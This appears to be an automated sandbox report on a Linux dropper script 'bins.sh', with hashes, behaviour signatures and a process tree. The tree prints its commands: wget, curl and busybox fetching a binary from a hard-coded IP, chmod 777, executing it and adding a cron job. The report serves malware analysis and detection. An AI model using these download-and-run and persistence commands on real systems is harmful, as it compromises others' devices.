Analysis
-
max time kernel
149s -
max time network
170s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
26/11/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
be05ee3cea44d55ae008c8cd4c6da21b
-
SHA1
fe4eeb6f208e3888654998b50aef8135758b80fb
-
SHA256
e77318536a44e8986f54eab60f8dc6e7e569080b0f89edaebfd2ab20cb3ffc78
-
SHA512
aa08f3f8910fad51ab9bd2d280969d6c8c90bd5d0638231fe5f49fd8135768a547c92b0c01b4d792736658b2fc4b674296c33451ccc806401b769c7d6c66c4df
-
SSDEEP
96:vvS29pZaS5sg0k40ZUVJBH3k5lVUMA++6IUR1NQgSdg0k40ZoHm9pZaSpO0H3Ho6:vvn2bVJiuE1P
Malware Config
Signatures
-
Contacts a large (2126) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 701 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i 702 cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i -
Renames itself 1 IoCs
pid Process 703 cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.xxzNVk crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/3/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/660/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/794/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/798/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/763/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/841/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/902/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/936/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/942/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/1011/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/12/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/644/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/874/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/914/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/854/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/900/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/986/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/939/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/944/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/949/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/4/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/7/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/143/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/839/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/720/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/910/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/994/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/719/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/728/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/807/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/16/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/276/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/740/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/935/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/25/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/789/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/827/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/850/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/765/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/826/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/869/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/9/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/41/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/164/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/753/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/1002/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/43/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/717/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/981/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/990/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/915/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/17/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/582/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/882/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/889/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/808/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/938/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/983/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/905/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/960/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/973/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/27/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/746/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i File opened for reading /proc/792/cmdline cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i wget File opened for modification /tmp/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i curl File opened for modification /tmp/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵
- Writes file to tmp directory
PID:659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵
- Writes file to tmp directory
PID:694
-
-
/bin/chmodchmod 777 cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i./cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:702 -
/bin/shsh -c "crontab -l"3⤵PID:705
-
/usr/bin/crontabcrontab -l4⤵PID:706
-
-
-
/bin/shsh -c "crontab -"3⤵PID:708
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:709
-
-
-
-
/bin/rmrm cECGl3B6id9qqLS2WRWnhTUzccLVyB7V3i2⤵PID:719
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d9PiSmjKNsCec9MS5De3PDcfMWvYR1l84y2⤵PID:722
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD56dd84f06b085eeffcec8e04d97eb15db
SHA1a97c1bf6492e4714ebb5adf01582c315f9af0701
SHA25637176363af7fac87c1e9894642b4e20a7ba4c08b131fc55df7074d09967d21b1
SHA5122e0bd0ef33b85125d33f8334ba87e220981bcf22833f5816380a95bcd46e84870e71073f0712b022397ada935fe09e1d25485665f0a16178928bbde00f90ce62